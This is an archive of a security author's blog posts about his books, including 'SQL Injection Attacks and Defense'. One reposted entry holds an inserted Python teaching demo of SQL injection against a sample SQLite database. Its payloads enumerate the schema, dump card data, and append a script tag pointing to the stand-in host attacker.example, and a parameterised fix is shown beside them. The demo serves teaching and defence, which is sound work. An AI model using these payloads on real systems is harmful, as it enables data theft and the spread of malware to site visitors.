I was just ego searching on Google for references to the book Nitesh and I wrote (Network Security Tools). I found a few new reviews indexed by Google - including one in the IEEE Cipher Newsletter, Dave King's TheSecure.net blog, and we may even be (according to the Google indexed course proposal) required reading at a Network Security course at the University of Colorado at Boulder. It's always nice to know as an author that someone actually does read your book :-)
Quick announcement - looks like I'll have another book coming out early next year - I have the contract from Syngress sitting on my dressing table right now.
More details (like what the book is on, who's involved in the project, etc.) will be forthcoming early next month, as I have to get the full book outline completed first. What I will tell you all is that it's a single-topic book, is going to be very technical, and I have some great contributing authors lined up for it :-)
I now realise that I last posted on the topic of a forthcoming book in October last year. Well, the book has now gone to production and should be hitting the shelves in May of 2009. For those of you who haven't been denial-of-serviced with my LinkedIn status updates on the progress of the book, it's called "SQL Injection Attacks and Defense", from Syngress.
I'm very happy with the great team of folks I managed to pull together for the book. The author list is as follows (in alphabetical order):
Hopefully we'll be able to see the proofs in the next couple of weeks, and see what the production folks have done with the 520-odd pages of code-heavy goodness we sent them :-)
This is a repost from the original on the GDS Security Blog
Having recently seen our book SQL Injection Attacks and Defense come out, it is very timely indeed to see, in the news of the recent indictment of Albert Gonzalez, that SQL Injection played a key part in the Heartland Payment Systems, 7-Eleven, and Hannaford Brothers breaches, as well as in those of two other unnamed victim companies.
So how can SQL Injection, which is an application-level problem, be used as a vector for attacking an organization? In a number of ways. SQL Injection gives an attacker the ability to interact with the database through the application's own database connection, so whatever is possible on the database server (with the privileges of the account the application connects as) may well be possible through SQL Injection. Modern database systems such as Oracle, SQL Server and others provide a rich variety of functionality for their users; all too often, some of this functionality can be abused by malicious individuals.
Making some assumptions, it's likely that something like the following occurred:
These types of hybrid attacks, where one type of attack is dovetailed with or launched over another, are becoming increasingly common. Another SQL Injection hybrid attack of recent note was the wave of SQL Injection mass attacks that started in early 2008. These used SQL Injection in another way: to inject links to JavaScript malware into the stored content of thousands of unsuspecting vulnerable sites, so that those sites then served the malware to their own visitors. It just goes to show that even a vulnerability that is over 10 years old still has some new tricks to show us.
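To make the two points above concrete (first, that an injection point lets the attacker do whatever the application's database account can do, and second, the 2008-style mass injection of script links into stored content), here is an added example that is not code from the original post, the book, or GDS. It uses Python's sqlite3 against an in-memory database with constructed sample data (the card numbers are the well-known test PANs, not real cards), and the attacker host `attacker.example` is hypothetical. SQLite's `execute()` refuses stacked statements, so `executescript()` is used to emulate a driver that allows them, as SQL Server and MySQL (with multi-statements enabled) do; note that SQLite concatenates strings with `||` where T-SQL uses `+`.

```python
import sqlite3

# Constructed sample schema and data (not from any real system); the PANs are
# the standard test card numbers, not real cards.
SCHEMA = """
CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT);
CREATE TABLE card_data (id INTEGER PRIMARY KEY, pan TEXT, expiry TEXT);
INSERT INTO products VALUES (1, 'Widget', 'A small widget');
INSERT INTO products VALUES (2, 'Gadget', 'A useful gadget');
INSERT INTO card_data VALUES (1, '4111111111111111', '12/11');
INSERT INTO card_data VALUES (2, '5500000000000004', '06/12');
"""

# Hypothetical attacker-controlled host referenced by the mass-injection payload.
MALWARE_TAG = '<script src="http://attacker.example/x.js"></script>'


def build_db():
    """Fresh in-memory database loaded with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_vulnerable(conn, product_id):
    """The classic bug: the request parameter is concatenated into the query
    text, so the attacker controls part of the SQL the database executes."""
    sql = "SELECT name, description FROM products WHERE id = " + product_id
    return conn.execute(sql).fetchall()


def search_vulnerable_stacked(conn, product_id):
    """Same bug on a driver that runs several statements per call.
    sqlite3's execute() refuses that, so executescript() emulates what
    SQL Server (or MySQL with multi-statements) would do; results are dropped."""
    sql = "SELECT name, description FROM products WHERE id = " + product_id
    conn.executescript(sql)


def search_safe(conn, product_id):
    """The fix: the value travels as a bound parameter, never as query text."""
    sql = "SELECT name, description FROM products WHERE id = ?"
    return conn.execute(sql, (product_id,)).fetchall()


def descriptions(conn):
    """All product descriptions in id order (shows the effect of the mass update)."""
    return [row[0] for row in conn.execute(
        "SELECT description FROM products ORDER BY id")]


# Payloads an attacker would send in place of a numeric product id.
# 1) Make the database describe itself: table names and CREATE statements.
ENUMERATE_SCHEMA = ("1 UNION SELECT name, sql FROM sqlite_master "
                    "WHERE type = 'table'")
# 2) Read a table the application never meant to expose through this page.
DUMP_CARDS = "0 UNION SELECT pan, expiry FROM card_data"
# 3) Simplified 2008-style mass injection: a stacked UPDATE appends a script
#    tag to every row, so every page rendering the column serves the link.
MASS_INJECT = ("1; UPDATE products SET description = description || '"
               + MALWARE_TAG + "'")


if __name__ == "__main__":
    db = build_db()
    print("schema via injection:", search_vulnerable(db, ENUMERATE_SCHEMA))
    print("card data via injection:", search_vulnerable(db, DUMP_CARDS))
    print("same payload, parameterised:", search_safe(db, DUMP_CARDS))
    search_vulnerable_stacked(db, MASS_INJECT)
    print("after mass injection:", descriptions(db))
```

The first payload is the attacker's reconnaissance step (on SQL Server the equivalent targets are `sysobjects`/`INFORMATION_SCHEMA`, on Oracle `ALL_TABLES`); the second is the data theft that only works because the page's query runs with an account that can read `card_data`. The stacked position used by the third payload is also where, on SQL Server, an attacker would call extended stored procedures such as `xp_cmdshell` if the account is permitted to use them, which is how a database-level foothold turns into an operating-system one. Against `search_safe` every payload is just an id that matches nothing.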
Just noticed a very complimentary review of SQL Injection Attacks and Defense at Help Net Security this morning. Will have to remember to pass a link to this on to the author team :-)
On a related note, I met Mirko from Help Net Security at BruCon in Brussels, but didn't manage to get an interview sorted out. There is a link to a previous email interview we did from the book review above...
A couple of good reviews of SQL Injection Attacks and Defense have been posted to Amazon recently (both 5 stars). Firstly we have a review from Chris Gates which gives a good balanced review of the book and points out some things he'd have liked to see. I agree with all of the points, and if we ever get a chance to do a second edition, we can add those on the todo list.
Second and most recent was a review from Richard Bejtlich, who was also very positive about the book and mentioned it may be in the running for his "best book of 2009"!
This page contains an archive of all entries posted to justinclarke.com in the Book Stuff category. They are listed from oldest to newest.